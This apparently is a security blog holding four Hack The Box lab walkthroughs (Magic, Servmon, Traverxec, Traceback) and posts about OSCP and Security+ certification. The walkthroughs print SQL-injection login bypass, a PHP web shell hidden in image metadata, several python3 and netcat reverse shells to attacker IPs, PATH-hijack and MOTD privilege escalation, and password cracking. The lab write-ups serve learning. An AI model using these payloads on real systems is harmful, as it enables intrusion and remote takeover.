Hack the Box — Magic walkthrough

This is my walkthrough for the Hack the Box machine, Magic.

Magic was released on Saturday April 25th, 2020 by TRX and is rated as a medium box.

Magic box information

Recon

I started scanning this box with the normal nmap command I normally use when starting off.
nmap -v -A -sV -O -p- -T4 -oA magic magic.htb
I do all ports so that I don’t miss anything. If I still don’t find anything initially, then I will go back and use the -sU flag for UDP in the case that there is some random UDP service running. In this case, the only two open ports are TCP 22, and 80.

nmap scan

One application I have found that makes my life a bit easier when it comes to penetration testing is the use of xsltproc. It takes the .xml generated by the -oA flag from nmap, and converts into a much more readable .html file. I used the following command to generate the .html file:

xsltrproc magic.xml -o magic.html

Converting XML output to HTML
Nmap scan results in HTML format

I see that port 80 is open, so I am going to focus on that.
I browse to the website, and I see that I am presented with a webpage full of photos. I also ran a dirb against the server, to make sure I didn’t miss anything. I found a few directories that could be useful.

Dirb results

Initial access

Magic’s default page

At the bottom left of the page there is a link to login. Maybe I can use default credentials to gain access, or possibly bypass the login. So I tried to use common sets of default user name and password combinations. None of them worked. So I tried to bypass the login with a common older SQL injection technique.

Username ‘or”=’
Password ‘or”=’

SQL Injection

After I hit Login, I am greeted with an Image Upload form.

Image Upload form

At first I tried to upload a PHP web shell file, in hopes that I could upload and then browse to it, but unfortunately the webserver restricted uploads to only image files.

Uploads restricted to only image files

I thought maybe I can upload a PHP file and rename it with a .jpg extension, and use the built-in exiftool to append a php command into the image. I have seen this in the past, so maybe this could work. I googled “magic.jpg” for something appropriate to upload to the server and append my php code to. I used the following command to append my php code in order to get command execution on the server.

exiftool -Comment='”; system($_GET[‘cmd’]); ?>’ magic.jpg

After I ran the above exiftool command I renamed the file to ‘magic.php.jpg‘, uploaded the file, browsed to the image, and issued a system command below:

Command execution

It worked. Now I needed to get a stable shell, as I found quickly that my uploaded image file was being deleted fairly quickly.

I know that newer versions of netcat don’t have the -e switch included. So I decided to see if python was installed. I found that python was not, but python3 is.

Python3 location

I used the following to get a shell back to my attacking machine

http://magic.htb/images/uploads/magic.php.jpg?cmd=python3 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.10.14.11”,443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([“/bin/bash”,”-i”]);’

Successful python3 reverse shell

Elevating to user privileges

After gaining a remote shell, I wanted to know what users are on the system so I can figure out how to escalate my privileges. So I looked at the /etc/passwd file and found a user named Thesus.

/etc/passwd file

Now that I know the users I am targeting, I started to look for ways to escalate. I started in the web sites root directory to see if there are any config files that may be of use to me. I see that there is a .htaccess file, which I inspected, but was of no use. I also see that there is a db.php5 file which had some interesting credentials.

db.php contents

I tried to use the credentials to login via SSH and I was denied access. It appears that the server requires public keys to login. I tried to switch user with the ‘su theseus’ command, which also did not work. The credentials are in a db.php5 file, which is for the website database. Maybe I can dump the contents of the database and file some additional credentials. So I use mysqldump to do this and look for credentials.

Mysqldump results

I can see that there is a login field that has credentials listed.
INSERT INTO login VALUES (1,’admin’,’Th3s3usW4sK1ng’);

I decided to upgrade my shell so that I can actually try and give the password when I try to use the su theseus command. So I used the following to upgrade my shell to be interactive.

python3 -c ‘import pty; pty.spawn(“/bin/bash”)’
I then issue the command su – theseus and give the password when prompted

su – theseus

I’ve changed users to theseus, and quickly grab my flag.

Theseus user flag

Escalating to root privileges

I tried at first to see which commands I could execute as root with the sudo -l command, but this account is not allowed to run sudo commands.

sudo -l

G0tmi1k has an excellent blog on Linux privilege escalation. Even though I do this quite frequently, I still find myself pulling up his blog.

I tend to look for interesting files and see if I can use anything to escalate to root
find / -perm -1000 -type d 2>/dev/null
find / -perm -g=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null

When I ran find / -perm -u=s -type f 2>/dev/null, and sifting through the mass amount of results I came across an interesting file. I ran this because I wanted to find files that are run as the owner, and not the user who started it.

Interesting file

I was able to single this file out because the date on the file didn’t match up with any of the other files and because of the group information.

sysinfo

It appeared that when I ran the /bin/sysinfo command that it was running other commands together to create some information about the system into one report.

I ran the strings command against the /bin/sysinfo file and my guess is right.

The command is not only running other system commands, but it is also doing so without specifying the full path. So I should be able to take advantage of this by changing the export $PATH statement.

So I’ll put a python3 reverse shell info a file called fdisk on my attacking box, host the file with over the web with the command python -m SimpleHTTPServer 1234, and copy the file over to the victim box with the wget http://10.10.14.11:1234/fdiskcommand. After that ill run the command to change the path export with export PATH=/home/theseus/asdf:$PATH (Note: I created the asdf directory under /home/theseus)

I need to also make sure that I change the permissions on the fdisk file to executable. I did this with the chmod +x fdisk command.

Here are the contents of my fdisk file
python3 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.10.14.11”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(“/bin/bash”)’

I ran the sysinfo command and I now have root.

root

Hack the Box — Servmon Walkthrough

This is my walkthrough for the Hack the Box machine Servmon.

Servmon was released Saturday April 11th 2020, by dmw0ng, and is rated as an easy box.

Servmon

Scanning and enumeration

I started off with my normal nmap scan
nmap -v -A -sV -O -T4 -p- -oA servmon servmon.htb

I do all ports so that I don’t miss anything. If I still don’t find anything initially, then I will go back and use the -sU flag for UDP in the case that there is some random UDP service running. I also use the -oA flag so that I can take the xml results from all of the output and make a nice html page that is much easier to read, and can sometimes be helpful when writing reports. I use a tool called xsltproc in Kali than does this for me.

The syntax is xsltproc servmon.xml -o servmon.html

xsltproc html output of my nmap results.

There are a lot of open ports that come back. A lot of them are standard Windows ports, but three ports really stick out. 21, 22, and 80.

I always want to check if there is anonymous access when I see an FTP server. SSH is not that common on Windows boxes, and of course there could be a vulnerable web application on port 80, so those are things I will want to check initially.

I’ll start with the FTP server.

So I can see that anonymous access is enabled from my results, so I’ll go and see what I can find.

I can see that there is a directory called Users, and two sub directories named Nathan, and Nadine. I then see that each of those user directories has an interesting file.

Servmon FTP Server

I downloaded the two files locally and read their contents. It looks to be some useful information I can use during this attack.

Interesting file contents

After some time reviewing the results from port 22 (SSH), I decide to move on and look at what’s on port 80. It turns out that it is running the NVMS-1000 web service.

NVMS-1000

User access

I do some searching and find that there is a known directory traversal and there is also Metasploit module currently available.

NVMS Metasploit module

I reviewed the information I found in the FTP server and saw that there is a note to the user Nathan. The note says that Nadine left the passwords.txt file on his desktop. Maybe I can grab this file and use it for access.

It appears to have worked. I’ll review the file and see what’s in it. Hopefully it’s a file with passwords that I can use to login with. Possibly the NVMS server, or maybe user access from the SSH service?

Retrieved passwords.txt file

It is a password list. Nice choice of passwords. Like Sir Mix A Lot, I too like big butts. Oddly enough, so does Nadine, as her credentials worked for the SSH service, which allowed me to retrieve the user flag. One down, one to go.

User Access

Now on to administrator access.

During my initial enumeration phase after getting user access, I ran a nestat -ano command to see what services were listening. I saw that in the “Notes to do.txt” file I downloaded from the FTP server earlier, that it was mentioned that the NSClient was locked down. So maybe this means it can only be access internally.

netstat -ano

One port really stands out to me, and that’s 8443. I have seen this port used in a lot of other penetration tests I have done for various other web based services. So I browse to it and discover that the NSClient++ is running on it. I find the login and try to use the same password as I used for Nadine, but it did not work. So I do some searching inside of Windows, and find the nsclient.ini file located in the C:\Program Files\NSClient++ directory. I also discovered that by clicking on the forgot password link, I am told which command to run to see the current password.

So I run the command nscp web — password –display and it shows me the current password.

NSClient++ password

So I try to login with that password and notice that I am greeting with the same 403 error as before. Interesting. Lets see what’s in the nsclient.ini file.

NSClient.ini

It looks like only the local host is allowed to access the webserver. It looks like I’ll have to setup port forward through an SSH tunnel to make this happen.

I run the following command to enable this
ssh -L 8443:127.0.0.1:8443 nadine@10.10.10.184

Then I try to access the NSClient web server by navigating to
https://127.0.0.1:8443/index.html#/

NSClient++ Access

I do some searching and find there is a privilege escalation for this version of NSClient++. I tried to follow the steps at https://www.exploit-db.com/exploits/46802 but they don’t work for me. While I was searching I came across documentation about access the webserver API via curl here https://docs.nsclient.org/api/scripts/

After A LOT of trial and error I am able to make it work with the following commands. Note that I’ve already uploaded NC.exe and have my netcat listener already listening on port 1234 on my Kali host.

nadine@SERVMON C:\Program Files\NSClient++>curl -s -k -u admin -X PUT https://localhost:8443/api/v1/scripts/ext/scripts/agent.bat –data-binary “C:\Temp\nc.exe 10.10.14.16 1234 -e cmd.exe”
Enter host password for user ‘admin’:
Added agent as scripts\agent.bat

nadine@SERVMON C:\Program Files\NSClient++>nscp settings –list
L core Duplicate commandfor command: list_file
C:\Program Files\NSClient++/nsclient.log could not be opened, Discarding: info: Duplicate commandfor command: list_file
/modules.CheckDisk=disabled
/modules.CheckEventLog=disabled
/modules.CheckExternalScripts=enabled
/modules.CheckHelpers=disabled
/modules.CheckNSCP=disabled
/modules.CheckSystem=disabled
/modules.CheckTaskSched=enabled
/modules.NRPEServer=enabled
/modules.Scheduler=enabled
/modules.WEBServer=enabled
/settings/NRPE/server.insecure=false
/settings/NRPE/server.ssl options=no-sslv2,no-sslv3
/settings/NRPE/server.verify mode=peer-cert
/settings/default.allowed hosts=127.0.0.1
/settings/default.password=ew2x6SsGTxjRwXOT
/settings/external scripts/scripts/TestingX.TestingX=TestingX
/settings/external scripts/scripts/default.command=cmd /c ” echo test > c:\Temp\test.txt”
/settings/external scripts/scripts.agent=scripts\agent.bat
/settings/external scripts/scripts.list_file=c:\Temp\evil.bat
/settings/external scripts/scripts.testing1=scripts\testing1.bat
/settings/external scripts/scripts.testing2=scripts\testing2.bat
/settings/external scripts/wrappings.bat=scripts\%SCRIPT% %ARGS%
/settings/external scripts/wrappings.ps1=cmd /c echo If (-Not (Test-Path “scripts\%SCRIPT%”) ) { Write-Host “UNKNOWN: Script "%SCRIPT%” not found.”; exit(3) }; scripts\%SCRIPT% $ARGS$; exit($lastexitcode) | powe
rshell.exe /noprofile -command –
/settings/external scripts/wrappings.vbs=cscript.exe //T:30 //NoLogo scripts\lib\wrapper.vbs %SCRIPT% %ARGS%
/settings/external scripts.allow arguments=true
/settings/scheduler/schedules/default.command=list_file
/settings/scheduler/schedules/default.interval=20
/settings/scheduler/schedules.Command=list_file
/settings/scheduler/schedules.foobar=
/settings/scheduler/schedules.list_file=
/settings/scheduler/schedules.testing1=

nadine@SERVMON C:\Program Files\NSClient++>curl -s -k -u admin https://localhost:8443/api/v1/queries/agent/commands/execute?time=3m.
Enter host password for user ‘admin’:
{“command”:”agent”,”lines”:[{“message”:”Command agent didn’t terminate within the timeout period 60s”,”perf”:{}}],”result”:3}
nadine@SERVMON C:\Program Files\NSClient++>

I am finally greeted with my prize.

Gaining admin access

VICTORY!

Thanks for reading?

Hack the Box — Traverxec Walkthrough

This is my walkthrough for the Hack The Box machine, Traverxec.

Traverxec was released Saturday, November 16, 2019 by jkr and is rated as one of the easier machines to hack.

I started off with my normal nmap scan
nmap -v -A -sV -O -T4 -p- -oA traverxec traverxec
I do all ports so that I don’t miss anything. If I still don’t find anything initially, then I will go back and use the -sU flag for UDP in the case that there is some random UDP service running. In this case, the only two open ports are TCP 22, and 80.

nmap scan

One application I have found that makes my life a bit easier when it comes to penetration testing is the use of xsltproc. It takes the .xml generated by the -oA flag from nmap, and converts into a much more readable .html file. I used the following command to generate the .html file:

xsltrproc traverxec_allports.xml -o traverxec_allports.html

xsltrproc output
The resulting .html file, which is much more readable and easier on the eyes.

Seeing that port 80 is open, I am going to focus on this. I noticed that a webserver named Nostromo version 1.9.6 is currently running. So first thing’s first, as every great penetration tester does, fire up google and get to searching.

Google Search Results
Google search results come back with a lot of hits for this particular web server.

Initial Access

So as we can see, there are lots of results for the Nostromo 1.9.6 web server. A lot of the results have references to Remote Code Execution (RCE). This is very promising. I’ll take a look in Metasploit to see if there are any exploits for this.

MetaSploit search results
Metasploit has an exploit for Nostromo

I’m in luck! Metasploit has a remote code execution exploit. I’ll set my options and run the exploit.

Metasploit usage
Metasploit usage

After running the exploit with my options set, I have a shell!

Shell access
Shell access

After reviewing some typical directories, I find that the Nostromo’s home directory is located in /var/nostromo.
From there I see there is a conf directory which has a .htpasswd and nhttpd.conf files which hold a password for a protected directory and configuration for the webserver, respectively. First thing’s first, lets get that password in the .htpasswd file cracked. I used john to crack the password with the rockyou.txt password file. I used the following command to crack the .htpasswd:

john –wordlist=/usr/share/wordlists/rockyou.txt –pot=cracked.txt .htpasswd

It takes a couple of minutes, but our password is cracked.

John cracking the .htpasswd
Our password is cracked

Now lets take a look at that config file and see what we can learn.

nhttpd.conf
The nostromo config file

After reviewing the config file, along with the documentation for the Nostromo config file, I discover that the last two lines of the config contained within the #HOMEDIRS section is what I am looking for.
I do an ls -al /home and find that there is a directory named david. This directory only gives me execute permissions.
Based on the config file, I am guessing that david is going to have a sub directory named public_www, so let’s see if we can get a directory listing of /home/david/public_www

Directory listing of /home
Listing the contents of the /home/david/public_www directory

So we see we have another directory named protected-file-area.
The Nostromo documentation says that the home directories listed in the config file can be accessed using ~
This means, we should be able to navigate to http://traverxec/~david and see some content.

Conent of the ~david directory
Browsing the ~david directory

Success! So now we should be able to browse to the protected-file-area and see if there is anything there which may be useful.
We browse to it and find that it asks for a user name and password. Remember that password we cracked from the .htpasswd file earlier? Typically, .htpasswd files are used to password protect a web directory.

Accessing the protected-file-area
Accessing the protected-file-area

As we can see, we now have access to the protected-file-area.

Gaining user access to David

We have now downloaded the backup-ssh-identity-files.tgz. I am going to assume that based on the name of the file, that this archive contains an ssh key to be used for remote ssh sessions.

I immediately try to ssh into the box with the key extracted from the archive, and I am asked for a pass phrase. I tried the password from earlier, hoping that the user would have the same password used, but no such luck. So let’s see if we can use ssh2john to make the key into a john readable format for cracking.

By default in Kali, ssh2john is located in /usr/share/john/ssh2john.py

I run the following command to generate a file suitable for john:

/usr/share/john/ssh2john.py id_rsa > hash.txt

Converting ssh to john for cracking
Generating our file for John to crack

John cracks our file pretty quickly.

john –wordlist=/usr/share/wordlists/rockyou.txt hash.txt

ssh passphrase cracked
We have successfully cracked the ssh passphrase

So now that we have what we think is the ssh passphrase, lets set the permissions and try to ssh in as david.

chmod 600 id_rsa
ssh -i id_rsa david@traverxec

Gaining access as david
Gaining access as david

Success! We can see that the user.txt file is found and readable. Now on to root.

Privilege Escalation

We can see that located in david’s home directory is a bin directory, and within that directory are two files. I cat the server-stats.sh file and notice that sudo is being run against journalctl. I look up the file on GTFOBins and find that journalctl can be used to break out into a shell. It also invokes the default pager of less. Which means we should see some information, and be able to scroll through the information. So lets run it and see if we can do it.

Running sudo the server-stats.sh command
Running the sudo server-stats.sh command

When running the server-stats.sh script, it isn’t behaving as expected. It should allow me to scroll through the information, but it is just running and returning the output of the script. Maybe this is because all of the information fits on the screen, and is being fully displayed. What happens when I change the size of my window and run the script again?

Running the sudo server-stats.sh command
Running the sudo server-stats.sh command

Perfect! So now lets try and escape out of the shell and hopefully get a root prompt out of it. Ill do this by typing
!/bin/bash

Gaining root privs
Root acess

Success! We can see that we now have a root shell and can see the root.txt flag!

That’s it! I hope you enjoyed this walkthrough, and found it helpful.
Please leave any feedback you may have!

Hack The Box — Traceback

Traceback was released on March 14th, 2020. It is a Linux box that is rated as easy.
I liked this box, as it had me learning more about how Message Of the Day (MOTD) works in Linux. It’s not something I have seen before, but I will certainly look for in my future engagements.

I started with my initial nmap scan

nmap –v –sV –A –O –T4 –p- -oA traceback traceback

I find that only ports 22 and 80 are currently open.

I decided to browse the website on port 80 to see what is being hosted.

It appears that this website has already been hacked and defaced.

The message on the html page says that they left a back door. I also see that the person who hacked in previously has graciously left their handle.  I decide to check the html source. Maybe they left something in there, or maybe there is something there from the actual server owner. Let’s do some searching on this. They may have left some clues, or bragged about how they got in etc.

I’m going to google the hacker’s name and see if I can find anything that might be a backdoor way into the server.

I find out that the hacker has their own Github, and a directory which contains a lot of different webshells. Maybe the hacker left one of these on the server for future use?

To make my life easier, I put all of the file names into a text file, so that I can use dirbuster to check for these files. It looks like the hacker is using the smevk.php backdoor.

It looks the shell requires a user name and password.

Looking at the code on Github, we see that the default user name and password are admin/admin. Ill try and see if that works.

It works!

I check the /etc/passwd file, and see that there are two users. Webadmin and sysadmin. Their home directories are under /home.

Ill check and see what permissions I have in the /home directories

I only have permissions to my own home directory. So I will see what’s in it.

There’s a note.txt that was created by the sysadmin user. Ill check and see what’s in the file.

I have access to Lua somewhere. The sysadmin says I know where to find it. Let me check the .bash_history file, and see if there is anything there that shows me anything.

I see some sudo commands listed in there. Let me see what sudo commands I have available to me.

It looks like I can run a command listed in the sysadmin home directory. Could this be the Lua binary I should be looking for? I’ll run it with the –h flag and see what the command output is.

Great! It is the Lua binary I am looking for. In addition, I can run it as sysadmin. Maybe I can run some Lua code as sysadmin.

It works! Now maybe I can put my local id_rsa.pub contents into the .ssh/authorized_keys

I’ve uploaded my id_rsa.pub into the /tmp folder, and I am going to echo the contents of it into the authorized_keys file. Now I’ll see if I can SSH in.

It worked!

Now to escalate to root.

I noticed that when I connected in, I see there is a MOTD presented to me. That tells me that a MOTD file is being executed. I’ll look through the MOTD files and see which file is giving me the greeting.

It looks like a header to me. So what I’ll try doing now is adding a reverse shell in the /tmp directory named shell.sh. It will contain the following code:

python3 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.10.14.2”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’       

Then I will make the file executable and world readable/writeable.

After this I will echo /tmp/shell.sh into the /etc/update-motd.d/00-header file. I am hoping that when I do this, and then log into the sysadmin user through ssh again, that it will trigger the 00-header file and execute the command I have echoed into it.

Bingo! I have obtained root privileges.

Thanks for reading!

Life as a pen tester after the PWK / OSCP

This is my personal experience of what happened after passing the OSCP exam.

TL;DR
I passed the OSCP, applied to a bunch of positions, went on a bunch of interviews, and after some time, became a red teamer. I am now a penetration tester with Leidos, and so far, I enjoy it.

Post Exam
I have noticed a lot of people posting blogs after taking the OSCP exam. A lot of them have been pretty good articles about their trials and tribulations in relations to the PWK course and subsequent OSCP exam. It’s great to see many others being successful in the OSCP exam and achieving their certification.

What I have also noticed is that not many people post a whole lot about their experiences after obtaining their OSCP. This article will be about my life post OSCP.

Searching and searching
A little after I passed the OSCP exam I updated my resume and my LinkedIn profile. At that time the OSCP wasn’t as well known to people as it is today. Kudos to Offensive Security for getting their name out there and making more people aware of what they provide. Not only just training, but also their security services. I had a few recruiters sending me messages about various positions. Mostly junior security positions. At that point of my career, I already had 20 years of IT experience, and a year and half into security engineering. So I was not looking for a junior position. I knew what I wanted, I was comfortable in my position, and was willing to wait until I found the right position that was right for me.

It took a year before I landed in the right position. During that year I went on countless interviews, including one within my own company (Lockheed Martin). I even landed an interview because of my article on my PWK/OSCP experience. Nothing was what I wanted. In the mean time while I was searching I was trying to keep my skills sharp. So I started working on more vulnerable machines from vuln hub, I was reading more security related articles, and getting more on /r/netsec.

Great success!
Eventually I found a great position for a government red team. I wasn’t sure I was going to be able to do it, as I hadn’t ever done any penetration testing for a company at that point. I thought to myself, what the hell? The worst that’ll happen is I’ll get the job.

So I applied, and I got a call back the next day from the recruiter. He wanted to talk about salary, and tell me a little more about the job etc. A couple of days after that, I had a technical interview with someone at the company. The screen went very well, and I was able to show them I was passionate about security and was knowledgeable about penetration testing. They wanted to bring me in for an on site penetration test in their lab, but the lab was down. I was happy to do the on site test if it were available. So instead I told them I would take a PC recording of me attacking a vulnerable machine, and the steps needed to enumerate etc. They liked the idea. So I did the task, and sent it over to the person I had spoke to. They liked what I had done,  and after an in person interview with the same person, and their management, they offered me the position.

I really enjoyed that process because it put me on the spot to perform and provide a deliverable, and in doing so rewarded me with a position on a red team. Not bad for someone who had no penetration testing experience.

I enjoyed my time with that particular red team. I learned a lot and got to do some really cool things. I got paid to hack government computers, and not go to jail! How cool is that?

To infinity and beyond!
Like all good things, everything comes to an end. The missions dried up, and I wasn’t getting any training. I wasn’t really looking for another opportunity, but my current position came up and was presented to me. I decided why not listen to what they had to say? I went to an interview and did well. I was offered the job with more money, and promised training. In addition they’d send me to defcon. After a couple of days of thinking, I decided to take the job. This new position is providing me with different challenges and I am learning. You can’t really beat that. I’m hoping to stay here for a few years, learn some more, and provide a valuable service to my customer.

About me
I have a BS and MS in IT/Cyber security and I have a whole bunch of IT certifications (MCSE, MCSA, RHCSA, VCP, CEH, GCIH, OSWP, OSCP).
I also have over 20 years of IT and security experience, and I am a Navy veteran.
I’m sure that my sheer drive and determination lead me to where I am today. Never stop learning, and always keep pursuing  your goals.

In the immortal words of conner4real: Never stop never stopping.
OSCP Never Stop Never Stopping

CompTIA Security+ CEUs

CompTIA Security+ CEUs

A quick overview of the CompTIA Security+ CEU program

So today a coworker was working on getting his administrative accounts setup. Part of the process to get the accounts created by our help desk is that you have to have a current, the keyword being current, Security+ certification offered by CompTIA. My coworker was unaware that CompTIA had changed its program which now requires that certification holders complete CEUs in addition to paying a yearly maintenance fee. After looking at his certification he discovered that he would have to take the exam all over again in order to be compliant to receive his administrative accounts. Was he ever mad. He just assumed that since he has one of the good for life certifications that he would be “good to go”.

This got me thinking that I should probably check my account standing since it has been a while since I have submitted any CEUs. So I head on over to CompTIAs website at https://www.certmetrics.com/comptia/default.aspx and of course I discover I have some catching up I need to do. After logging in I find that I can write a blog of no less than 500 words about the Security+ certification and receive one CEU for this action. Score! So here I am writing about this experience, trying to catch up on CEUs, and of my coworkers experience.

For those that also hold the Offensive Security Certified Professional (OSCP) certification, it does not count for CEUs under CompTIA’s program. I have not reached out to EC-Council yet. Hopefully it does so that I can knock those CEUS for the year out of the way as well.

Some other items you can submit CEUS for are as follows:
(Note that this isn’t a complete list)
Write a book
Publish a blog
Publish a white paper/Article
Work experience (once per year)
College courses
Other certifications.

Since I completed my Master’s degree this year, I was able to add the last two courses I took to get me 20 credits toward my 3 year goal of 50 CEUs. Each one of the graduate courses I finished this year gave me 10 CEUs per class.

So now I am almost half way toward my goal of 50 CEUs. I may have to go and take the CASP exam sometime soon. If you are able to pass an exam equal to or higher in regards to difficulty, it would give you the max amount of CEUs. This means that if you have Security+ and pass the CASP exam, you would be all caught up on CEUs for Security+. However, you would still have to do the CEUs required for the CASP exam, which I believe is a lot more.

The point of this program is to ensure certification holders are staying up to date on security and are staying aware of the latest types of attacks and ways to mitigate those attacks. I do wish that CompTIA would be more accepting of other certifications (like the OSCP) so that the time I spent on that course and exam would also give me CEUs for my other certifications such as Security+ and CEH.

 

Try Harder! My Penetration Testing with Kali Linux OSCP Review and course/lab experience

Try Harder! My Penetration Testing with Kali Linux OSCP Review and course/lab experience — My OSCP Review

Introduction:
Obtaining the OSCP certification is a challenge like no other. After my experience with the OSCP exam and course from Offensive Security, I decided to go ahead and write an OSCP Review. I decided to take the OSCP course and exam in September 2014 after seeing some fellow members of a forum I frequent quite a bit (www.techexams.net) state that they were taking it soon. This is a course and exam I wanted to tackle as I have a passion for IT security. I figured why not sign up as the same time and compare notes etc with like minded people, and make the process easier.

So I signed up, for the 90 days, and a week later, I was sent the introduction email with all the information I needed to connect to the Offensive Security labs via VPN, IRC information, login information, and forum information.

About me:
I have about 20 years of combined IT experience. I have two MCSEs, two MCSAs, MCITP:VA, VCP5, Security+, CEHv7,  RHCSA, a BS in IT security, and I am finishing up my Masters in Applied IT with a concentration in Applied Cyber Security.  I currently work for Lockheed Martin as an Active Directory Engineer on a government contract.

The course:
When I first signed up for the course, I quickly went through the manual and videos that included with the email once you start the course. A lot of the information I was already familiar with as I had to review a lot of it for the CEHv7 certification. As we all know the OSCP exam and course are very technical and very hands on. The CEH is pretty much all about theory and multiple choice questions. I was glad to take a course that not only talked about tools, but how to use them, and why they are used.

So when I first started the course, I was very motivated. The very first day I was in the labs, I was able to knock out 3 servers with very minimal effort. At this point I am thinking to myself, this is too easy! That is, until I met “sufference”. Over the course of the next month or so I was able to get to about 20 servers. As I said in the beginning I was super motivated, but as time goes on, I was losing interest, and just simply didn’t have the time.

Sufference
As I said, I thought I this course was too easy at first, and I was able to knock out server after server. That is until I met sufference. This is where I lost a lot of motivation. I believe I spent 3 weeks alone on this beast of a server. It demotivated me and made me feel like a child who just had his ice cream money stolen by Vic the bully down the street. I spent hours a day on this server alone obsessing over it. I decided to come back to it. So I move on to some other challenging servers and I am able to root them and get some of my confidence back.

I decide to go back and kick sufference right in the teeth after this. I do a lot of googling, AND I MEAN A LOT, and finally I find a way in and get a limited shell! Great! Half the battle has been won! This is not enough for me, I need to make this server my bitch and show it who’s boss. Yeah… not so much. Again I decide to regroup and move on…. maybe the answer will come to me. I pop a few more servers (at this point I am close to my 90 day point. I HAVE TO OWN THIS BEFORE MY LAB TIME IS UP!  One more attempt I tell myself.

I finally come across something that clicks for me, and I have one of those AH-HA! moments. Its something I should have seen sooner… but for some reason I did not, and stayed ignorant. I finally found the answer, and I was able to root sufference after nearly 3 months! My motivation and confidence have been renewed.

/sufference

I decide to extend for another 30 days. I only have about 30 servers owned at this point… and I hadn’t unlocked any of the other networks. I can do better. So I renew and I decide my new goal is to at least get into the admin network. After a lot of time spent in the labs and researching exploits etc, I had finally learned how to pivot into the admin network. Thank you proxy chains! I was able to get all of the servers in the IT network, and all but one in the admin network. My time was almost up in the labs, so I decided to go ahead and book the exam. I felt I was ready and could do this.

The Exam (part 1):
The exam is a 24 hour challenge. This means that you have 24 hours from the time the exam starts to try and compromise the servers assigned to you in the exam. Additionally you have another 24 hours after that to write your report and send it in for grading. You are graded on your report alone, and you HAVE to complete this in order to pass the exam. You are also encouraged to submit a lab report documenting your efforts in the lab. You may get extra points for this should you need them on the exam. This is all explained in the exam email.

I booked my exam for a Saturday evening starting at 5pm.  The email comes right at 5pm. I connect to the network, look at the exam guide that is provided and start working. In the first hour I had managed to root 2 servers. I felt like I was on a roll, and that I was going to end this beast early. Not so much.

After the first two, I didn’t get anything on the next three servers for the next 12 hours. Nothing. Zilch, Nada! I was deflated and dumbfounded. I figured I should take a nap and come back to it. Maybe I am just exhausted and needed some rest. I take a 3 hour nap and come back. This is what I needed. In the next hour or two after that, I had 2 more limited shells. I couldn’t escalate. I tried until the bitter end. At the end, I had two fully compromised hosts, and 2 limited shells. Would this be enough to pass the exam?

Turns out it wasn’t. I got the email Tuesday afternoon stating I hadn’t passed.

I will NOT be defeated!

The Exam (part 2):
I decided to extend my lab time for another 15 days, and book the exam 2 weeks after I had failed. I decided to concentrate on privilege escalations since this is what I was felt I was weak at. I spent the next couple of weeks working on that as well as buffer overflows. I really didn’t too much in the labs, except maybe a few servers I may have missed in the public network. I just really wanted to work on escalations. Turns out this was a smart move on my part.

This time I book the exam for 10AM. Again the email comes, along with the exam guide and instructions to connect in. Away I go. Again, I get the first 2 servers in the first hour. I don’t get a head of myself and just keep plugging away. I start on the next server and it falls in the next hour. By the 5th hour I had 3 full compromises and 3 limited shells. I KNOW I have passed at this point, by the amount of points I will be awarded based on the exam guide. Again… this is not enough for me. I have to prove to myself that I can TRY HARDER!

I do just that.

After 6 hours in the exam, I feel like I am done. 4 full compromises out of 5, and the last server I had a limited shell. This should have been about 90 points. I am satisfied but tired. I was smart enough to document everything as I went, so I only had to spend another hour fixing up my report. I sent my report to the offsec team, and walked away from my computer like a boss.

OSCP Passed!

 

Wrap up:
This is by far the most challenging and rewarding course and certification I have ever taken. I respect anyone else who has the guts to take this on and succeed. It truly shows you know your stuff in this field.

I sent off my report Saturday evening around 4-5PM. I got the response this morning (Monday Feb 23, 2015) that I had passed the exam. I am elated that this challenge is over and I was able to overcome it. I tried harder when it mattered most and I was able to accomplish what I set out to do.

I am now an Offensive Security Certified Professional because I tried harder!

My OSCP Review

I can not say enough good things about the OSCP course and exam. I was challenged and I learned a whole lot more than I thought I would about security and penetration testing. I hope that the OSCP will gain more recognition by companies. The OSCP is the certification I am most proud of by far.

Time to update the old resume to reflect the new OSCP certification!

 

Resources:
Some resources I used for this challenge:
http://www.fuzzysecurity.com/tutorials/16.html
http://pentestmonkey.net/category/cheat-sheet/shell
https://github.com/GDSSecurity/Windows-Exploit-Suggester
https://github.com/PenturaLabs/Linux_Exploit_Suggester
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
http://www.offensive-security.com/metasploit-unleashed/Main_Page

I also read the hackers playbook, the Metasploit unleashed book, and the Penetration Testing book by Georgia Weidman.

These are all very good resources.

Thanks to all those who helped me and pushed me when I needed it, especially all the other people who have written an OSCP review to help others.

More information about the OSCP and PWK can be found here:
https://www.offensive-security.com/information-security-training/penetration-testing-with-kali-linux/
https://www.offensive-security.com/information-security-certifications/oscp-offensive-security-certified-professional/

Additionally the offsec admins can be contacted via IRC at irc.freenode.net #offsec

If anyone feels wants to talk or has any questions, feel free to connect to irc.osswg.com #oscp
I will not give any hints or answers, but I can try and answer any other questions pertaining to the OSCP. Good luck to anyone wishing to take on the OSCP course and exam. After you pass the exam, write your own OSCP review!

OSCP Challenge

I have decided to take on the OSCP (Offensive Security Certified Professional) course and exam.

I decided to tackle the OSCP exam, and make a project out of it.
This thread will be used to document my experiences with the course leading up to the exam.

Course information:
Penetration Testing with Kali

Penetration Testing with Kali Linux (PWK) is an online training course designed for network administrators and security professionals who need to acquaint themselves with the world of offensive information security. This penetration testing training introduces the latest hacking tools and techniques in the field and includes remote virtual penetration testing labs for practicing the course materials. Penetration Testing with Kali Linux attempts to simulate a full penetration test, from start to finish, by injecting the student into a rich, diverse, and vulnerable network environment.

Penetration Testing with Kali Linux is an entry-level course but still requires students to have certain knowledge prior to attending the class. A solid understanding of TCP/IP, networking, and reasonable Linux skills are required. This course is not for the faint of heart; it requires practice, testing, and the ability to want to learn in a manner that will grow your career in the information security field and defeat any learning plateau. Offensive Security challenges you to rise above the rest, dive into the fine arts of advanced penetration testing, and to Try Harder™.

